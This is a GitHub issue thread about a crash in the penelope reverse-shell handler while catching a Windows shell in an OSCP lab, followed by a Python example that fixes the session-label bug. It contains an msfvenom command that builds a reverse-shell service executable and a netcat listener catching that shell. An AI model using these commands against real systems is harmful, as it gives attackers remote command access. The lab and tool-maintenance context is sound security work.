
Error catching msfvenom shell from a Windows host

[Open] six-two opened this issue 9 months ago • 1 comment

Hi @brightio, thank you for your great tool. So far it has worked pretty well, but I encountered the following error.

When trying to catch some shells, penelope has an error and drops them. As you can see in the following excerpt, I had one session. Then a new connection comes in, but it causes an error (Oops... line). Afterwards I do not get a new session:

(Penelope)─(Session [4])> sessions

➤  CLIENTWK222-192.168.147.222-Microsoft_Windows_11_Pro-x64-based_PC

    ID | Shell | User              | Source                      
     1 | Basic | clientwk222\diana | Connect(192.168.45.248:4444)

(Penelope)─(Session [4])> 
Oops...🐞
────────────────────────────────────────────────────────────────────────────────
Traceback (most recent call last):
  File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3.13/threading.py", line 992, in run
    self._target(*self._args, **self._kwargs)
    ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/.local/share/pipx/venvs/penelope/bin/penelope.py", line 2016, in __init__
    f"{paint(self.system + '-' + self.arch).cyan}"
             ~~~~~~~~~~~~^~~~~
TypeError: unsupported operand type(s) for +: 'NoneType' and 'str'
────────────────────────────────────────────────────────────────────────────────
Penelope version: 0.13.8
Python version: 3.13.2 (main, Mar 13 2025, 14:29:07) [GCC 14.2.0]
System: #1 SMP Kali 6.12.13-1kali1 (2025-02-11)


(Penelope)> sessions

➤  CLIENTWK222-192.168.147.222-Microsoft_Windows_11_Pro-x64-based_PC

    ID | Shell | User              | Source                      
     1 | Basic | clientwk222\diana | Connect(192.168.45.248:4444)

Steps to reproduce

I generated a reverse shell with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -v shellcode -f exe-service -o WindowsService1.exe

I executed the service exe on a Windows VM (OSCP lab machine). It creates a normal reverse shell, which for example works fine with regular netcat:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.147.222] 60971
Microsoft Windows [Version 10.0.22000.978]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>

But when I use penelope to handle the shell it fails with the error from the top of my post. So far this only occurred with the msfvenom shell. Using the powershell payload that penelope generates, I can start a reverse shell on the same system.

six-two, Apr 15 '25 18:04

Hi @six-two, many thanks for your bug report! I executed the same payload on a test machine and got a shell successfully. Could you please try to run it again but this time with -d switch on penelope and send me the output? Thank you

brightio, Jun 01 '25 23:06

Hi @brightio,

the VM where the behavior occurred was part of the OSCP labs, which I sadly no longer have access to. If someone with access to the labs reads this, I think it was one of the capstone lab VMs in chapter 17 (Windows PrivEsc).

I just tried the steps with my Windows 10 desktop, and like you I got a working shell from that. Maybe OffSec just had a really weirdly configured VM?

But as far as I see, changing the line from string concatenation to format strings (something like str(paint(f"{self.system}-{self.arch}").cyan)) should at least fix the error I got without negative side effects. Though I am not sure if the weird system/shell would cause errors somewhere else too.

six-two, Jun 02 '25 17:06

Penelope relies on the systeminfo command to retrieve session details, but if I remember well, this command was disabled on one of the OSCP machines. I will address this bug shortly. Thank you very much for reporting it!!

brightio, Jun 03 '25 18:06
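The two points raised in the thread, the crash from concatenating a None field and the reliance on systeminfo for those fields, are illustrated below in an added example. This is not penelope's code and not code from either poster; the systeminfo excerpt and the "command not recognized" text are constructed for the example, the field names it reads (Host Name, OS Name, System Type) and the "unknown" placeholder are assumptions, and `legacy_label` just reproduces the failing `system + '-' + arch` pattern from the traceback next to a form that tolerates a missing field.

```python
import re
from typing import Optional, Tuple

# Constructed sample of the fields a handler would read from `systeminfo`
# (made up for this example, not captured from the reporter's machine).
SYSTEMINFO_OK = """\
Host Name:                 CLIENTWK222
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22000 N/A Build 22000
System Type:               x64-based PC
"""

# Constructed stand-in for a host where the command cannot run; the real
# wording depends on how the administrator blocked it.
SYSTEMINFO_BLOCKED = """\
'systeminfo' is not recognized as an internal or external command,
operable program or batch file.
"""

# One "Key:   value" line of systeminfo output (assumed English key names).
_FIELD = re.compile(r"^(?P<key>[A-Za-z ]+?):\s+(?P<value>.+?)\s*$", re.M)


def parse_systeminfo(output: str) -> dict:
    """Return {lower-cased key: value}; an error message yields {}."""
    return {m["key"].strip().lower(): m["value"].strip()
            for m in _FIELD.finditer(output)}


def session_details(output: str) -> Tuple[Optional[str], Optional[str], Optional[str]]:
    """(hostname, system, arch), each None when systeminfo gave nothing usable."""
    f = parse_systeminfo(output)
    return f.get("host name"), f.get("os name"), f.get("system type")


def legacy_label(system: Optional[str], arch: Optional[str]) -> str:
    """The failing pattern from the traceback: '+' on None raises TypeError,
    and inside a session thread's __init__ that drops the whole connection."""
    return system + "-" + arch


def build_label(hostname: Optional[str], ip: str,
                system: Optional[str], arch: Optional[str],
                placeholder: str = "unknown") -> str:
    """Hardened form: substitute a placeholder (assumed value) for any missing
    field, then build the HOST-IP-SYSTEM-ARCH name shown in the session list,
    with spaces turned into underscores as in the listing above."""
    parts = [hostname, ip, system, arch]
    return "-".join((p or placeholder).replace(" ", "_") for p in parts)


if __name__ == "__main__":
    # Both samples yield a label; the blocked host no longer loses its session.
    for raw in (SYSTEMINFO_OK, SYSTEMINFO_BLOCKED):
        host, system, arch = session_details(raw)
        print(build_label(host, "192.168.147.222", system, arch))
```

The f-string change suggested in the thread would also stop the exception, but it prints the literal text "None" into the session name; filling in a placeholder keeps the name readable and makes it obvious to the operator that enumeration on that host was blocked, which is itself a useful signal during a lab or an engagement.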